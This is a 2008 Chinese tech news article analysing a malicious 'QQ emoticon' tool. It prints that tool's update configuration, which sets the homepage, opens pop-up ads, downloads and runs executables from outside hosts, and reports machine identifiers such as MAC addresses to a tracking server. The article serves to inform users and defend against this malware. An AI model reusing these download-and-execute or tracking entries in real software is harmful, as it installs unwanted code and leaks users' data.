科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网软件频道千万QQ表情暗藏病毒 温柔背后暗藏秘密

千万QQ表情暗藏病毒 温柔背后暗藏秘密

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

QQ表情本来是广受用户欢迎的一个实用工具,然而,有人却将其变成了一种恶性病毒。最近,笔者不断接到求助电话,受到一款名叫多多QQ表情病毒的骚扰。笔者随即对这款工具软件进行调查,发现了其背后还暗藏着惊人秘密。

作者:东方 来源:计算机世界 2008年2月15日

关键字: 腾讯QQ 病毒 QQ QQ表情

  • 评论
  • 分享微博
  • 分享邮件

  对UPDATE的分析

  显性动作

  [SetHomePage]               Url=http://www.9991.com/

  [PopupIE]                Url=http://www.chanet.com.cn/click.cgi?a=6606&d=3086&u=

  [PopupIE]                Url=http://www.b2b2.net/51gg/index.html

  [PopupIE]                Url=http://www.7mp3.com

  [PopupIE]                Url=http://www.600001.com/

  [PopupIE]                Url=http://www.600005.com/

  隐性动作

  [Actions]访问          Url=http://file.qqhelper.com/up/update.dat

  [Update]升级          Url=http://www.yulexingkong.com/mop/uninstalldrv.exe

  [Update]          Url=http://www.ha0l23.com/softbaby/uninstalltmp.exe

  [Update]          Url=http://tongji.qqhelper.com/tj/tj?setupid=$(setupid)&mac=$(computerid)&type=$(sendflag)&version=$(version)&exeversion=$(exeversion)&setupdate=$(setupdate)

  在机器生成以下目录以及文件:

  C:\Program Files\Common Files\UPDATE

  update.dat

  update.exe

  以上动作都是update.exe干的

  另外生成一个目录以及文件:

  C:\Program Files\Common Files\SAND

  updatesr.ini

  svr.dat

  qqfacerclient.exe

  twunk_8.exe

  还没有看到具体动作,有潜伏期。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章